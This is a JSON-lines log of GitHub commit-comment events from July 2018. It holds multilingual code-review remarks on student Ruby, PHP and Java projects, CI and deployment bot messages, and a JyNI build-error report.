{"id":"7948793521","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668242,"position":40,"line":25,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:16:57Z","updated_at":"2018-07-11T09:16:57Z","author_association":"NONE","body":"Лучше сделать, что-бы этот метод принимал аргумент с типом и внутри уже использовать, или метод select для массива, или метод count"}},"created_at":"2018-07-11T09:16:57Z"}
{"id":"7948798343","type":"CommitCommentEvent","actor":{"login":"slabua"},"repo":{"name":"slabua/robotics-filters"},"payload":{"comment":{"id":29668252,"position":null,"line":null,"path":null,"commit_id":"f3ae1843578aca98998be49e1bc2ff10b5dda423","created_at":"2018-07-11T09:17:50Z","updated_at":"2018-07-11T09:17:50Z","author_association":"OWNER","body":"@aliaazri glad to know it was useful for you!"}},"created_at":"2018-07-11T09:17:50Z"}
{"id":"7948799455","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668255,"position":22,"line":16,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:18:01Z","updated_at":"2018-07-11T09:18:01Z","author_association":"NONE","body":"Выше в подобном примере уже писал, что нет смысла тут делать проверку типа. Если это не поезд, то он не будет найден в массиве поездов"}},"created_at":"2018-07-11T09:18:01Z"}
{"id":"7948800421","type":"CommitCommentEvent","actor":{"login":"reithick"},"repo":{"name":"reithick/ABMS"},"payload":{"comment":{"id":29668257,"position":null,"line":null,"path":null,"commit_id":"e9c01a070744fef234080cb1623800e5445b4dd7","created_at":"2018-07-11T09:18:12Z","updated_at":"2018-07-11T09:18:12Z","author_association":"OWNER","body":"The final Snippet"}},"created_at":"2018-07-11T09:18:12Z"}
{"id":"7948810902","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29668287,"position":62,"line":90,"path":"Category.php","commit_id":"478b35203c85c4af13eecc341ffd4a69dffb77a8","created_at":"2018-07-11T09:20:06Z","updated_at":"2018-07-11T09:20:06Z","author_association":"NONE","body":"$catInc лучше переименовать в **$parents**\r\nЕе значения получаются путем дополнительно запроса к таблице **incl_categories**. Этот запрос должен быть реализован в дополнительном методе **getParents( $categoryId )**"}},"created_at":"2018-07-11T09:20:06Z"}
{"id":"7948813420","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29668295,"position":null,"line":null,"path":null,"commit_id":"9a07b0e739e37ed0ba552f179407a54b12414bcb","created_at":"2018-07-11T09:20:32Z","updated_at":"2018-07-11T09:20:32Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-keyword](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-keyword).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-keyword-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-11T09:20:32Z"}
{"id":"7948818900","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668297,"position":3,"line":2,"path":"Lesson3/train.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:21:32Z","updated_at":"2018-07-11T09:21:32Z","author_association":"NONE","body":"``` :current_station, :previous_station, :next_station``` - отдельные методы. см классы выше"}},"created_at":"2018-07-11T09:21:32Z"}
{"id":"7948824970","type":"CommitCommentEvent","actor":{"login":"donatopellegrino"},"repo":{"name":"donatopellegrino/Pellegrino-luglio-esame"},"payload":{"comment":{"id":29668304,"position":null,"line":null,"path":null,"commit_id":"22dd0c1b614663f0299acd62db5f45d0bf55acc8","created_at":"2018-07-11T09:22:39Z","updated_at":"2018-07-11T09:22:39Z","author_association":"OWNER","body":"__API Description file syntax error on line 1__: Validation failed. /paths/{id}/get is missing path parameter(s) for {id} (Autogenerated message from apiary.io)"}},"created_at":"2018-07-11T09:22:39Z"}
{"id":"7948827923","type":"CommitCommentEvent","actor":{"login":"qiaoyu-jzh"},"repo":{"name":"qiaoyu-jzh/hello-world"},"payload":{"comment":{"id":29668311,"position":null,"line":null,"path":null,"commit_id":"8776b9a32567fda226dd41678cbf53cbe22b3ef7","created_at":"2018-07-11T09:23:12Z","updated_at":"2018-07-11T09:23:12Z","author_association":"OWNER","body":"python"}},"created_at":"2018-07-11T09:23:12Z"}
{"id":"7948829892","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668316,"position":21,"line":17,"path":"Lesson3/train.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:23:32Z","updated_at":"2018-07-11T09:23:32Z","author_association":"NONE","body":"Давай лучше тут будем ставить скорость в ноль, если коэффициент замедления будет менять значение скорости на отрицательное значение"}},"created_at":"2018-07-11T09:23:32Z"}
{"id":"7948831262","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29668319,"position":64,"line":92,"path":"Category.php","commit_id":"478b35203c85c4af13eecc341ffd4a69dffb77a8","created_at":"2018-07-11T09:23:47Z","updated_at":"2018-07-11T09:23:47Z","author_association":"NONE","body":"Строки 92 - 102 не нужны"}},"created_at":"2018-07-11T09:23:47Z"}
{"id":"7948861200","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668369,"position":102,"line":53,"path":"Lesson3/train.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:29:01Z","updated_at":"2018-07-11T09:29:01Z","author_association":"NONE","body":"Ну еще нужно сказать станции, что поезд с нее уехал, и сказать следующей станции, что поезд на нее приехал"}},"created_at":"2018-07-11T09:29:01Z"}
{"id":"7948862662","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29668372,"position":114,"line":57,"path":"Lesson3/train.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T09:29:16Z","updated_at":"2018-07-11T09:29:16Z","author_association":"NONE","body":"см move_forward"}},"created_at":"2018-07-11T09:29:16Z"}
{"id":"7948864407","type":"CommitCommentEvent","actor":{"login":"bzdgn"},"repo":{"name":"dlbunker/ps-spring-boot-and-angular"},"payload":{"comment":{"id":29668376,"position":18,"line":18,"path":"node/server.js","commit_id":"8b7f7930402a297c1c4126bbb5cb5956d4c632ad","created_at":"2018-07-11T09:29:34Z","updated_at":"2018-07-11T09:29:34Z","author_association":"NONE","body":"This is not working, after using the command `ng build --prod` the output directory is\r\n\r\n`./dist/bike-ui`\r\n\r\nThe line must be as follows;\r\n\r\napp.use(express.static(path.join(__dirname, 'dist/bike-ui')));\r\n"}},"created_at":"2018-07-11T09:29:34Z"}
{"id":"7948864555","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668377,"position":27,"line":28,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/service/PostServiceImpl.java","commit_id":"77efba94aec314d540c7a789140408b2cb1a56bd","created_at":"2018-07-11T09:29:35Z","updated_at":"2018-07-11T09:29:35Z","author_association":"NONE","body":"\"Wait, what?\" Here you ask the repo to get everything from the database and put it back. I think the plan was a bit different. Maybe you wanted to get a list of posts as a parameter and save the whole list in one step."}},"created_at":"2018-07-11T09:29:35Z"}
{"id":"7948866262","type":"CommitCommentEvent","actor":{"login":"b6i0l5l"},"repo":{"name":"b6i0l5l/GAME"},"payload":{"comment":{"id":29668380,"position":null,"line":null,"path":null,"commit_id":"2a6007dc2d85360b226beda2adda892649e10967","created_at":"2018-07-11T09:29:52Z","updated_at":"2018-07-11T09:29:52Z","author_association":"OWNER","body":"new commment"}},"created_at":"2018-07-11T09:29:52Z"}
{"id":"7948869703","type":"CommitCommentEvent","actor":{"login":"bzdgn"},"repo":{"name":"dlbunker/ps-spring-boot-and-angular"},"payload":{"comment":{"id":29668388,"position":25,"line":25,"path":"node/server.js","commit_id":"8b7f7930402a297c1c4126bbb5cb5956d4c632ad","created_at":"2018-07-11T09:30:28Z","updated_at":"2018-07-11T09:30:28Z","author_association":"NONE","body":"This is not working, after using the command `ng build --prod` the output directory is\r\n\r\n`./dist/bike-ui`\r\n\r\nThe line must be as follows;\r\n\r\n  res.sendFile(path.join(__dirname, 'dist/bike-ui/index.html'));\r\n"}},"created_at":"2018-07-11T09:30:28Z"}
{"id":"7948872486","type":"CommitCommentEvent","actor":{"login":"khieropen"},"repo":{"name":"khieropen/test"},"payload":{"comment":{"id":29668390,"position":2,"line":2,"path":"filetest","commit_id":"c51ae558711961d6abaeafd8d6f829b07a8ae060","created_at":"2018-07-11T09:30:58Z","updated_at":"2018-07-11T09:30:58Z","author_association":"OWNER","body":"ici je verifie\r\n"}},"created_at":"2018-07-11T09:30:58Z"}
{"id":"7948873094","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dialogflow-v2-client"},"payload":{"comment":{"id":29668392,"position":null,"line":null,"path":null,"commit_id":"cf2b7e6998eeaf6881f8ce0dc974c64045638298","created_at":"2018-07-11T09:31:05Z","updated_at":"2018-07-11T09:31:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/9db350e1-1bdd-46ce-b6bc-f1a1fe7aae7f?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7c2d4740-e52d-4d28-af66-f8589eede134?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\") deployed [dialogflow-v2-client](https://github.com/godo13405/dialogflow-v2-client/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180711-093104 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180711-093104\") to [prod](https://console.bluemix.net/apps/7c20ca82-deb0-46f6-91cb-ccd808781f77?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-11T09:31:05Z"}
{"id":"7948874905","type":"CommitCommentEvent","actor":{"login":"wutaizeng"},"repo":{"name":"improbable-eng/thanos"},"payload":{"comment":{"id":29668399,"position":12,"line":16,"path":"docs/components/rule.md","commit_id":"c14e33b9ceb37b019bc08d641f9b65c3b6d31f4c","created_at":"2018-07-11T09:31:24Z","updated_at":"2018-07-11T09:31:24Z","author_association":"NONE","body":"should include `http://` at prefix"}},"created_at":"2018-07-11T09:31:24Z"}
{"id":"7948876914","type":"CommitCommentEvent","actor":{"login":"nlhiorth"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29668401,"position":null,"line":null,"path":null,"commit_id":"e1ef278a763e9fc01dc9579e1cd6c7cba1fc5c05","created_at":"2018-07-11T09:31:45Z","updated_at":"2018-07-11T09:31:45Z","author_association":"COLLABORATOR","body":"hit that mf like button"}},"created_at":"2018-07-11T09:31:45Z"}
{"id":"7948877534","type":"CommitCommentEvent","actor":{"login":"cseshohag"},"repo":{"name":"OpenCodeFoundation/asset-manager"},"payload":{"comment":{"id":29668402,"position":4,"line":6,"path":"src/AssetManager.Infrastructure/Data/EfRepository.cs","commit_id":"2b5b6df98be1ad612ba2ec0c4fe99e995c4be382","created_at":"2018-07-11T09:31:52Z","updated_at":"2018-07-11T09:31:52Z","author_association":"MEMBER","body":"Why u used System.Linq ??"}},"created_at":"2018-07-11T09:31:52Z"}
{"id":"7948881777","type":"CommitCommentEvent","actor":{"login":"Sovatna"},"repo":{"name":"Mjrovai/Video-Streaming-with-Flask"},"payload":{"comment":{"id":29668410,"position":null,"line":null,"path":null,"commit_id":"405096627e811ff259d82689c20707825aa045b0","created_at":"2018-07-11T09:32:38Z","updated_at":"2018-07-11T09:32:38Z","author_association":"NONE","body":"Hi Mjrovai, \r\nThank you so much for sharing such interesting project. I followed you and it works well. \r\nAnother important point is that this project contain the html inside it. Is it possible to send this stream directly to own web server? for example, I own a website: www.v-gro.com, I I want to send all the streaming video to the website. \r\n\r\nBest regards, \r\n\r\nSovatna"}},"created_at":"2018-07-11T09:32:38Z"}
{"id":"7948881940","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29668411,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-11T09:32:39Z","updated_at":"2018-07-11T09:32:39Z","author_association":"NONE","body":"update-libraries (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T09:32:39Z"}
{"id":"7948887898","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668426,"position":32,"line":29,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/controller/PostController.java","commit_id":"c3666d6a5d7ad136203046f7fa1b7bcd6eadf8c8","created_at":"2018-07-11T09:33:43Z","updated_at":"2018-07-11T09:33:43Z","author_association":"NONE","body":"This `addPage` is ok until you have only one model/controller, but to avoid any misunderstanding I would name it `addNewPost()` and return the `(add)NewPost` template."}},"created_at":"2018-07-11T09:33:43Z"}
{"id":"7948888300","type":"CommitCommentEvent","actor":{"login":"ratnesh83"},"repo":{"name":"ratnesh83/Angular-MultiSelect-DropDown"},"payload":{"comment":{"id":29668430,"position":null,"line":null,"path":null,"commit_id":"ce7e46bbe5a70f8f2209779383f1e71ed118ac97","created_at":"2018-07-11T09:33:47Z","updated_at":"2018-07-11T09:33:47Z","author_association":"OWNER","body":"### Angular MultiSelect DropDown\r\n\r\nIt as an multiselect, single select dropdown where you can set options as an array of objects with different keys for value to be displayed as options and get the corresponding different value as result.\r\n\r\n### Installation\r\n`npm install angular-multiselect-dropdown ng4-click-outside`\r\n\r\n### Usage\r\nimport the SeedModule from angular-multiselect-dropdown in the module where you want to use it\r\n\r\n**app.module.ts**\r\n`import { BrowserModule } from '@angular/platform-browser';`\r\n`import { NgModule} from '@angular/core';`\r\n`import { AppComponent } from './app.component';`\r\n`import { SeedModule } from 'angular-multiselect-dropdown';`\r\n\r\n`@NgModule({`\r\n`...`\r\n`imports: [\r\n    BrowserModule,\r\n    SeedModule\r\n  ],`\r\n\r\nThen define an array of objects in the component. Where each object contains two key value pair. One key is for the display value on the dropdown. The other key is for the corresponding value to be received after selecting a particular display value on the dropdown.\r\n\r\n**app.component.ts**\r\n`options = [\r\n    {name:\"key1\",value: \"abc\"}\r\n  ]`\r\n\r\n**app.component.html**\r\n`<ns-dropdown [options]=\"options\" [mode]=\"'multiSelect'\" [valueField]=\"'name'\" [textField]=\"'value'\"></ns-dropdown>`"}},"created_at":"2018-07-11T09:33:47Z"}
{"id":"7948895691","type":"CommitCommentEvent","actor":{"login":"Tricky1975"},"repo":{"name":"Wendicka/Scyndi"},"payload":{"comment":{"id":29668446,"position":null,"line":null,"path":null,"commit_id":"3b7de7885c6df801522c1ce467122adf5e6b9c31","created_at":"2018-07-11T09:35:07Z","updated_at":"2018-07-11T09:35:07Z","author_association":"CONTRIBUTOR","body":"Please note, the current setup does NOT output any translated code (aside from the declarations of global variables), but this is the bases that will make this possible in later steps..."}},"created_at":"2018-07-11T09:35:07Z"}
{"id":"7948896352","type":"CommitCommentEvent","actor":{"login":"Sovatna"},"repo":{"name":"Mjrovai/Video-Streaming-with-Flask"},"payload":{"comment":{"id":29668447,"position":null,"line":null,"path":null,"commit_id":"405096627e811ff259d82689c20707825aa045b0","created_at":"2018-07-11T09:35:14Z","updated_at":"2018-07-11T09:35:14Z","author_association":"NONE","body":"Hello Mjrovai,\r\n\r\nThank you very much for your sharing such interesting project. I followed it and it works well. However, I would like to extend the project to send the streaming video directly to website: www.v-gro.com. How possible would it be? please kindly help me. \r\n\r\nBest regards, \r\nSovatna"}},"created_at":"2018-07-11T09:35:14Z"}
{"id":"7948896905","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"alekseyspjsb/les10nodejs"},"payload":{"comment":{"id":29668448,"position":6,"line":6,"path":"selftask_1.js","commit_id":"1a6e6292846449a1d0b1927d0ba8fd024a8449be","created_at":"2018-07-11T09:35:19Z","updated_at":"2018-07-11T09:35:19Z","author_association":"COLLABORATOR","body":"хорошая практика ставить точку с запятой везде или неставить везде"}},"created_at":"2018-07-11T09:35:19Z"}
{"id":"7948902905","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/Dzsodie"},"payload":{"comment":{"id":29668454,"position":18,"line":42,"path":"week-08/day-05/newreddit/src/main/java/com/greenfoxacademy/newreddit/controller/PostController.java","commit_id":"77efba94aec314d540c7a789140408b2cb1a56bd","created_at":"2018-07-11T09:36:23Z","updated_at":"2018-07-11T09:36:23Z","author_association":"NONE","body":"I would put this(3 lines) logic into the service and in the controller just call `postService.upVote(id);` to keep the single responsibility principle. "}},"created_at":"2018-07-11T09:36:23Z"}
{"id":"7948906749","type":"CommitCommentEvent","actor":{"login":"DrDaveD"},"repo":{"name":"singularityware/singularity"},"payload":{"comment":{"id":29668463,"position":3,"line":2,"path":"configure.ac","commit_id":"41229565eedb14b196423e603fee23141a780a18","created_at":"2018-07-11T09:37:08Z","updated_at":"2018-07-11T09:37:08Z","author_association":"CONTRIBUTOR","body":"Was this commit added without a pull request?\r\n\r\nIt has caused the [Debian travis builds](https://travis-ci.org/singularityware/singularity/builds/402426369?utm_source=github_status&utm_medium=notification) to fail."}},"created_at":"2018-07-11T09:37:08Z"}
{"id":"7948911922","type":"CommitCommentEvent","actor":{"login":"schrej"},"repo":{"name":"getantibody/antibody"},"payload":{"comment":{"id":29668470,"position":null,"line":null,"path":null,"commit_id":"170ea34d3a65edddbddf54a7ca765567b81eedd5","created_at":"2018-07-11T09:38:07Z","updated_at":"2018-07-11T09:38:07Z","author_association":"NONE","body":"I just did that manually to fix proxy issues I had yesterday and wanted to PR it. GitHub told me I can't merge automatically. Looked why: fixed 13 hrs ago, :hankey:.\r\nThanks anyways though! "}},"created_at":"2018-07-11T09:38:07Z"}
{"id":"7948919993","type":"CommitCommentEvent","actor":{"login":"meiclm"},"repo":{"name":"meiclm/myreport"},"payload":{"comment":{"id":29668483,"position":null,"line":null,"path":null,"commit_id":"3548f62b00bf23c7c211876a4b79e570b83b0a35","created_at":"2018-07-11T09:39:38Z","updated_at":"2018-07-11T09:39:38Z","author_association":"OWNER","body":"00"}},"created_at":"2018-07-11T09:39:38Z"}
{"id":"7948921166","type":"CommitCommentEvent","actor":{"login":"meiclm"},"repo":{"name":"meiclm/myreport"},"payload":{"comment":{"id":29668485,"position":null,"line":null,"path":null,"commit_id":"3548f62b00bf23c7c211876a4b79e570b83b0a35","created_at":"2018-07-11T09:39:51Z","updated_at":"2018-07-11T09:39:51Z","author_association":"OWNER","body":"tycxs"}},"created_at":"2018-07-11T09:39:51Z"}
{"id":"7948922687","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"defunkt/jquery-pjax"},"payload":{"comment":{"id":29668489,"position":null,"line":null,"path":null,"commit_id":"00abdeb61de89029f4a14741c0c09bbadc097c78","created_at":"2018-07-11T09:40:08Z","updated_at":"2018-07-11T09:40:08Z","author_association":"NONE","body":"00abdeb"}},"created_at":"2018-07-11T09:40:08Z"}
{"id":"7948922771","type":"CommitCommentEvent","actor":{"login":"DrDaveD"},"repo":{"name":"singularityware/singularity"},"payload":{"comment":{"id":29668490,"position":11,"line":11,"path":"debian/changelog","commit_id":"41229565eedb14b196423e603fee23141a780a18","created_at":"2018-07-11T09:40:09Z","updated_at":"2018-07-11T09:40:09Z","author_association":"CONTRIBUTOR","body":"Is this supposed to be a complete list?  For example the shim init #1221 PR isn't included here."}},"created_at":"2018-07-11T09:40:09Z"}
{"id":"7948923798","type":"CommitCommentEvent","actor":{"login":"donatopellegrino"},"repo":{"name":"donatopellegrino/Pellegrino-luglio-esame"},"payload":{"comment":{"id":29668493,"position":null,"line":null,"path":null,"commit_id":"448da2fd0bf86f45c016a11d017b9f40ea599eb9","created_at":"2018-07-11T09:40:19Z","updated_at":"2018-07-11T09:40:19Z","author_association":"OWNER","body":"__API Description file syntax error on line 33__: Error resolving $ref pointer \"#/definitions/teaminfo\". \nToken \"definitions\" does not exist. (Autogenerated message from apiary.io)"}},"created_at":"2018-07-11T09:40:19Z"}
{"id":"7948924402","type":"CommitCommentEvent","actor":{"login":"CalumFreeman"},"repo":{"name":"CalumFreeman/JyNI"},"payload":{"comment":{"id":29668495,"position":null,"line":null,"path":null,"commit_id":"eb9198dccb19083c8971c088a31dae991e17c17c","created_at":"2018-07-11T09:40:25Z","updated_at":"2018-07-11T09:40:25Z","author_association":"OWNER","body":"I found when upgrading from jython 2.7.1 to the most recent version that JyNI no longer built. The actual error  when running make is at the bottom of this post. It appears to be a simple constructor mismatch when JyNI tries to construct a new PyShadowString with the wrong arguments for the constructor. To fix this I changed [JyNI-Java/src/JyNI/JyNIImporter.java:164](https://github.com/Stewori/JyNI/blob/master/JyNI-Java/src/JyNI/JyNIImporter.java#L164) from\r\n\r\n`PySystemState.prefix = new PyShadowString(PySystemState.prefix, pyHome.toString());`\r\nto\r\n`PySystemState.prefix = new PyShadowString(PySystemState.prefix.toString(), pyHome.toString());`\r\n\r\nThis does allow JyNI to build, but it seems overly simplistic and I don't know how to check it behaves correctly.\r\n\r\nThe block of code this line is in starts at line [156](https://github.com/Stewori/JyNI/blob/master/JyNI-Java/src/JyNI/JyNIImporter.java#L156) with an if statement which checks if the system is windows. My machine is not and I don't really have access to a windows machine at the moment.\r\n\r\nHere's the original error:\r\n\r\n```\r\nJyNI-Java/src/JyNI/JyNIImporter.java:164: error: no suitable constructor found for PyShadowString(PyObject,String)\r\n\t\t\t\tPySystemState.prefix = new PyShadowString(PySystemState.prefix, pyHome.toString());\r\n\t\t\t\t                       ^\r\n    constructor PyShadowString.PyShadowString(String,String) is not applicable\r\n      (argument mismatch; PyObject cannot be converted to String)\r\n    constructor PyShadowString.PyShadowString(PyObject,PyObject) is not applicable\r\n      (argument mismatch; String cannot be converted to PyObject)\r\n```"}},"created_at":"2018-07-11T09:40:25Z"}
{"id":"7948928071","type":"CommitCommentEvent","actor":{"login":"James-W2"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29668502,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-11T09:41:06Z","updated_at":"2018-07-11T09:41:06Z","author_association":"NONE","body":"Thank you so much for fixing this connector!  I'm truly sorry for my \"blunt\"\nresponses.  I do understand that you are volunteering, using your skills to\nkeep these apps working properly.\n \nJames W.\n\n  _____  \n\nFrom: Alexey [mailto:notifications@github.com] \nSent: Wednesday, July 11, 2018 2:04 AM\nTo: web-scrobbler/web-scrobbler\nCc: James-W2; Mention\nSubject: Re: [web-scrobbler/web-scrobbler] Pandora: fix playing state\ndetection (98f23ac)\n\n\n\nHi @James-W2 <https://github.com/James-W2> !\n\nThe new version is out. It should be available in few minutes in Chrome Web\nStore and AMO.\n\nThe connectors (the file you tried to open) are supposed to be executed in\nChrome environment. It's okay then use run them on Windows and see an error\nmessage box.\n\n-\nYou are receiving this because you were mentioned.\nReply to this email directly, view\n<https://github.com/web-scrobbler/web-scrobbler/commit/98f23ac85a5ac60e1a468\n812b4c6bb45c521e0f9#commitcomment-29668084> it on GitHub, or mute\n<https://github.com/notifications/unsubscribe-auth/AbBXftdRgBwAqN0XNd3EIGD9M\nww6fgdIks5uFb9ugaJpZM4U-PCe> the thread.\n<https://github.com/notifications/beacon/AbBXftiDJDVzi9ZbZ4MmyHh6Rnj_Dwm1ks5\nuFb9ugaJpZM4U-PCe.gif> \n\n"}},"created_at":"2018-07-11T09:41:06Z"}
{"id":"7948930314","type":"CommitCommentEvent","actor":{"login":"AlaaFkirin"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29668506,"position":null,"line":null,"path":null,"commit_id":"3d00e8c7bb077adce9445212f785b79d0a906230","created_at":"2018-07-11T09:41:31Z","updated_at":"2018-07-11T09:41:31Z","author_association":"NONE","body":"I think We need to delete that padding at line 22"}},"created_at":"2018-07-11T09:41:31Z"}
{"id":"7948932697","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29668509,"position":28,"line":17,"path":"src/main/java/ComputerModel/ComputerModel.java","commit_id":"8396c41c0dc048a6c9f660c9c2ec463172302171","created_at":"2018-07-11T09:41:57Z","updated_at":"2018-07-11T09:41:57Z","author_association":"NONE","body":"И всё-таки ```actions``` - это не действие, это сущность, во множественном числе. Название метода - это какой-то глагол: ```calculate```, ```shutdown```, ```start``` и так далее. Вот у тебя в методе выводится текст \"Обработка данных\" - создай метод, который бы назывался \"обработка данных\", только по-английски."}},"created_at":"2018-07-11T09:41:57Z"}
{"id":"7948943485","type":"CommitCommentEvent","actor":{"login":"dreamthen"},"repo":{"name":"dreamthen/novel-h5"},"payload":{"comment":{"id":29668524,"position":null,"line":null,"path":null,"commit_id":"20fa3830501246ecbcd25ad30c17c093faf58aa5","created_at":"2018-07-11T09:43:57Z","updated_at":"2018-07-11T09:43:57Z","author_association":"OWNER","body":"发现一个bug，并进行修改"}},"created_at":"2018-07-11T09:43:57Z"}
{"id":"7948944582","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29668527,"position":null,"line":null,"path":null,"commit_id":"ddfd8a5f1777e8540d63acaab33bbbe8b5d211df","created_at":"2018-07-11T09:44:10Z","updated_at":"2018-07-11T09:44:10Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-260](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-260).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-260-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T09:44:10Z"}
{"id":"7948945430","type":"CommitCommentEvent","actor":{"login":"knyokolodi"},"repo":{"name":"knyokolodi/DjangoBlog"},"payload":{"comment":{"id":29668528,"position":null,"line":null,"path":null,"commit_id":"f83f091c6eff4db249d3c44c85a87dca8762083e","created_at":"2018-07-11T09:44:18Z","updated_at":"2018-07-11T09:44:18Z","author_association":"OWNER","body":"django blog commit"}},"created_at":"2018-07-11T09:44:18Z"}
{"id":"7948950720","type":"CommitCommentEvent","actor":{"login":"inukshuk"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29668535,"position":null,"line":null,"path":null,"commit_id":"f7ab64bb503109ba11d4438f22fbac06b8d68e3a","created_at":"2018-07-11T09:45:16Z","updated_at":"2018-07-11T09:45:16Z","author_association":"MEMBER","body":"Yes, I believe we can get notifications for that. My idea was to shim `Services.obs` for that reason."}},"created_at":"2018-07-11T09:45:16Z"}
{"id":"7948953340","type":"CommitCommentEvent","actor":{"login":"donatopellegrino"},"repo":{"name":"donatopellegrino/Pellegrino-luglio-esame"},"payload":{"comment":{"id":29668545,"position":null,"line":null,"path":null,"commit_id":"674e2345445c15d3e1de0444f67815eb3e0a95c2","created_at":"2018-07-11T09:45:42Z","updated_at":"2018-07-11T09:45:42Z","author_association":"OWNER","body":"__API Description file syntax error on line 33__: Error resolving $ref pointer \"#/definitions/teaminfo\". \nToken \"definitions\" does not exist. (Autogenerated message from apiary.io)"}},"created_at":"2018-07-11T09:45:42Z"}
